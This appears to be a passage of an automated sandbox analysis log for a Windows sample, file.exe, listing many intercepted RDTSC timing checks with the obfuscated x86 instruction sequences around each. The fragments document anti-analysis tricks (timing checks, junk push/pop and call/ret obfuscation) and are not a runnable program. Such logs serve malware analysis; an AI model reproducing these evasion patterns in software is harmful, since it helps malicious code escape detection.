                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF4CA5 second address: FF4CAA instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF56B0 second address: FF5759 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F67208644CEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F67208644D6h 0x0000000f nop 0x00000010 push 00000000h 0x00000012 push edx 0x00000013 call 00007F67208644C8h 0x00000018 pop edx 0x00000019 mov dword ptr [esp+04h], edx 0x0000001d add dword ptr [esp+04h], 0000001Ah 0x00000025 inc edx 0x00000026 push edx 0x00000027 ret 0x00000028 pop edx 0x00000029 ret 0x0000002a sbb di, 930Fh 0x0000002f push 00000000h 0x00000031 push 00000000h 0x00000033 push ebx 0x00000034 call 00007F67208644C8h 0x00000039 pop ebx 0x0000003a mov dword ptr [esp+04h], ebx 0x0000003e add dword ptr [esp+04h], 0000001Ch 0x00000046 inc ebx 0x00000047 push ebx 0x00000048 ret 0x00000049 pop ebx 0x0000004a ret 0x0000004b mov edi, dword ptr [ebp+122D29D8h] 0x00000051 mov si, bx 0x00000054 push 00000000h 0x00000056 mov si, D6A1h 0x0000005a xchg eax, ebx 0x0000005b push esi 0x0000005c push esi 0x0000005d pushad 0x0000005e popad 0x0000005f pop esi 0x00000060 pop esi 0x00000061 push eax 0x00000062 pushad 0x00000063 push eax 0x00000064 push edx 0x00000065 jmp 00007F67208644D8h 0x0000006a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF54B4 second address: FF54B9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF5759 second address: FF575D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF54B9 second address: FF54BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF6181 second address: FF6187 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF6187 second address: FF618B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF8012 second address: FF8019 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF73D7 second address: FF73DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF8019 second address: FF8061 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a or dword ptr [ebp+122D2215h], ecx 0x00000010 push 00000000h 0x00000012 push edi 0x00000013 mov di, ax 0x00000016 pop esi 0x00000017 push 00000000h 0x00000019 push 00000000h 0x0000001b push edx 0x0000001c call 00007F67208644C8h 0x00000021 pop edx 0x00000022 mov dword ptr [esp+04h], edx 0x00000026 add dword ptr [esp+04h], 00000018h 0x0000002e inc edx 0x0000002f push edx 0x00000030 ret 0x00000031 pop edx 0x00000032 ret 0x00000033 push eax 0x00000034 push eax 0x00000035 push edx 0x00000036 jno 00007F67208644CCh 0x0000003c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF8061 second address: FF8066 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFAEE0 second address: FFAF2B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 jp 00007F67208644C6h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [esp], eax 0x00000011 mov bx, C812h 0x00000015 push 00000000h 0x00000017 push 00000000h 0x00000019 push edi 0x0000001a call 00007F67208644C8h 0x0000001f pop edi 0x00000020 mov dword ptr [esp+04h], edi 0x00000024 add dword ptr [esp+04h], 0000001Ah 0x0000002c inc edi 0x0000002d push edi 0x0000002e ret 0x0000002f pop edi 0x00000030 ret 0x00000031 mov dword ptr [ebp+122D17DDh], edx 0x00000037 push 00000000h 0x00000039 push eax 0x0000003a pushad 0x0000003b push eax 0x0000003c push edx 0x0000003d jg 00007F67208644C6h 0x00000043 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFAF2B second address: FFAF2F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFBE9E second address: FFBEA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFBEA3 second address: FFBEA9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFBF1E second address: FFBF22 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFDD6F second address: FFDD79 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFED6E second address: FFED74 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFDEAC second address: FFDED5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6720533115h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jnl 00007F672053310Ch 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFDED5 second address: FFDEDC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1001F22 second address: 1001F27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1002FFC second address: 1003017 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F67208644CCh 0x00000008 jnl 00007F67208644C6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jbe 00007F67208644CCh 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1000F30 second address: 1000FA6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push dword ptr fs:[00000000h] 0x00000012 push 00000000h 0x00000014 push ecx 0x00000015 call 00007F6720533108h 0x0000001a pop ecx 0x0000001b mov dword ptr [esp+04h], ecx 0x0000001f add dword ptr [esp+04h], 00000016h 0x00000027 inc ecx 0x00000028 push ecx 0x00000029 ret 0x0000002a pop ecx 0x0000002b ret 0x0000002c mov dword ptr [ebp+122D31FDh], ecx 0x00000032 mov dword ptr fs:[00000000h], esp 0x00000039 push 00000000h 0x0000003b push ebp 0x0000003c call 00007F6720533108h 0x00000041 pop ebp 0x00000042 mov dword ptr [esp+04h], ebp 0x00000046 add dword ptr [esp+04h], 0000001Bh 0x0000004e inc ebp 0x0000004f push ebp 0x00000050 ret 0x00000051 pop ebp 0x00000052 ret 0x00000053 mov eax, dword ptr [ebp+122D0D55h] 0x00000059 sbb bl, FFFFFFF4h 0x0000005c push FFFFFFFFh 0x0000005e mov ebx, 788436FEh 0x00000063 nop 0x00000064 pushad 0x00000065 push eax 0x00000066 push edx 0x00000067 push ecx 0x00000068 pop ecx 0x00000069 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1003017 second address: 100301B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1004069 second address: 10040DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 nop 0x00000006 or di, 532Bh 0x0000000b push 00000000h 0x0000000d push 00000000h 0x0000000f push ebp 0x00000010 call 00007F6720533108h 0x00000015 pop ebp 0x00000016 mov dword ptr [esp+04h], ebp 0x0000001a add dword ptr [esp+04h], 00000017h 0x00000022 inc ebp 0x00000023 push ebp 0x00000024 ret 0x00000025 pop ebp 0x00000026 ret 0x00000027 mov di, bx 0x0000002a push 00000000h 0x0000002c push 00000000h 0x0000002e push eax 0x0000002f call 00007F6720533108h 0x00000034 pop eax 0x00000035 mov dword ptr [esp+04h], eax 0x00000039 add dword ptr [esp+04h], 00000016h 0x00000041 inc eax 0x00000042 push eax 0x00000043 ret 0x00000044 pop eax 0x00000045 ret 0x00000046 jg 00007F672053310Bh 0x0000004c jnl 00007F672053310Bh 0x00000052 push eax 0x00000053 pushad 0x00000054 push eax 0x00000055 push edx 0x00000056 jmp 00007F672053310Dh 0x0000005b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1004F88 second address: 1004F92 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F67208644C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1004F92 second address: 100501C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F672053310Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push edx 0x0000000f call 00007F6720533108h 0x00000014 pop edx 0x00000015 mov dword ptr [esp+04h], edx 0x00000019 add dword ptr [esp+04h], 00000014h 0x00000021 inc edx 0x00000022 push edx 0x00000023 ret 0x00000024 pop edx 0x00000025 ret 0x00000026 jc 00007F6720533111h 0x0000002c jmp 00007F672053310Bh 0x00000031 push 00000000h 0x00000033 push 00000000h 0x00000035 push ebx 0x00000036 call 00007F6720533108h 0x0000003b pop ebx 0x0000003c mov dword ptr [esp+04h], ebx 0x00000040 add dword ptr [esp+04h], 0000001Ch 0x00000048 inc ebx 0x00000049 push ebx 0x0000004a ret 0x0000004b pop ebx 0x0000004c ret 0x0000004d sub ebx, 134DC0BDh 0x00000053 push 00000000h 0x00000055 push ebx 0x00000056 mov ebx, dword ptr [ebp+122D29F4h] 0x0000005c pop ebx 0x0000005d xchg eax, esi 0x0000005e pushad 0x0000005f jmp 00007F672053310Dh 0x00000064 pushad 0x00000065 push eax 0x00000066 push edx 0x00000067 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10060D7 second address: 10060E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e push esi 0x0000000f pop esi 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10060E8 second address: 10060FD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F6720533110h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1008036 second address: 100806B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 mov dword ptr [esp], eax 0x0000000a or dword ptr [ebp+1244C0C1h], ecx 0x00000010 push 00000000h 0x00000012 mov edi, dword ptr [ebp+122D36F5h] 0x00000018 push 00000000h 0x0000001a push edi 0x0000001b jmp 00007F67208644D1h 0x00000020 pop edi 0x00000021 push eax 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 pushad 0x00000026 popad 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100806B second address: 1008070 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1008070 second address: 1008075 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1008075 second address: 100807B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10081A8 second address: 10081AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10081AE second address: 10081B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10091D3 second address: 10091D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10091D7 second address: 10091DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10091DD second address: 10091E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1010718 second address: 1010731 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F672053310Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d jo 00007F6720533106h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1010731 second address: 1010763 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jg 00007F67208644C6h 0x0000000d pop eax 0x0000000e popad 0x0000000f pushad 0x00000010 push ebx 0x00000011 push edi 0x00000012 pop edi 0x00000013 pushad 0x00000014 popad 0x00000015 pop ebx 0x00000016 push eax 0x00000017 push edx 0x00000018 jne 00007F67208644C6h 0x0000001e jmp 00007F67208644D4h 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1010894 second address: 10108C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jmp 00007F672053310Eh 0x0000000a jmp 00007F6720533118h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push edi 0x00000013 pop edi 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1010A4E second address: 1010A63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F67208644C6h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d jbe 00007F67208644C8h 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1010A63 second address: 1010A9A instructions: 0x00000000 rdtsc 0x00000002 jc 00007F6720533118h 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F6720533110h 0x0000000f pop edx 0x00000010 pop eax 0x00000011 jbe 00007F6720533125h 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a pop eax 0x0000001b jmp 00007F6720533111h 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100A102 second address: 100A107 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100A1FC second address: 100A200 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100A200 second address: 100A206 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101C60C second address: 101C624 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F6720533106h 0x00000008 jno 00007F6720533106h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jne 00007F6720533112h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101C8A9 second address: 101C8AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101C8AD second address: 101C8E5 instructions: 0x00000000 rdtsc 0x00000002 js 00007F6720533106h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F6720533115h 0x00000014 push edi 0x00000015 jmp 00007F6720533112h 0x0000001a pop edi 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101C8E5 second address: 101C921 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F67208644D6h 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F67208644D5h 0x0000000e jmp 00007F67208644CDh 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101C921 second address: 101C925 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101CA81 second address: 101CAB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 jne 00007F67208644D1h 0x0000000d jmp 00007F67208644CBh 0x00000012 pushad 0x00000013 jmp 00007F67208644D3h 0x00000018 push edx 0x00000019 pop edx 0x0000001a popad 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101D02F second address: 101D035 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10238F5 second address: 1023908 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F67208644CFh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1023908 second address: 102390C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102390C second address: 1023925 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F67208644CEh 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1023925 second address: 102392A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1022327 second address: 1022345 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F67208644CAh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e jl 00007F67208644C6h 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 push ebx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1022A51 second address: 1022A57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1022A57 second address: 1022A5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1022A5D second address: 1022A66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1022A66 second address: 1022A99 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F67208644C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F67208644D7h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 jl 00007F67208644C6h 0x00000019 jg 00007F67208644C6h 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1022A99 second address: 1022AAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnp 00007F672053310Eh 0x0000000b push edi 0x0000000c pop edi 0x0000000d jne 00007F6720533106h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102302A second address: 1023034 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F67208644C6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1023034 second address: 1023038 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1023038 second address: 1023044 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1023044 second address: 1023048 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1023048 second address: 102304E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102319F second address: 10231B4 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F6720533108h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jne 00007F672053311Eh 0x00000012 push ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10231B4 second address: 10231C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop ecx 0x00000007 jne 00007F67208644CEh 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1023789 second address: 10237AC instructions: 0x00000000 rdtsc 0x00000002 jp 00007F672053310Ch 0x00000008 pushad 0x00000009 push eax 0x0000000a pop eax 0x0000000b jmp 00007F6720533110h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1021FEB second address: 1022007 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 jo 00007F67208644C6h 0x0000000e jc 00007F67208644C6h 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 push ebx 0x00000018 pushad 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1022007 second address: 1022014 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jbe 00007F6720533106h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1022014 second address: 1022018 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1022018 second address: 102202C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jns 00007F6720533106h 0x0000000e jp 00007F6720533106h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10269CF second address: 10269EA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F67208644CBh 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jnp 00007F67208644C6h 0x00000013 push edx 0x00000014 pop edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10269EA second address: 10269FF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6720533111h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102CE62 second address: 102CE66 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102CE66 second address: 102CE93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F672053310Ch 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007F6720533116h 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102CE93 second address: 102CEBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F67208644D3h 0x0000000a popad 0x0000000b pushad 0x0000000c push ecx 0x0000000d jnp 00007F67208644C6h 0x00000013 pop ecx 0x00000014 push eax 0x00000015 push edx 0x00000016 jnl 00007F67208644C6h 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102CEBD second address: 102CEC1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF050D second address: FF051D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 pushad 0x00000007 pushad 0x00000008 js 00007F67208644C6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
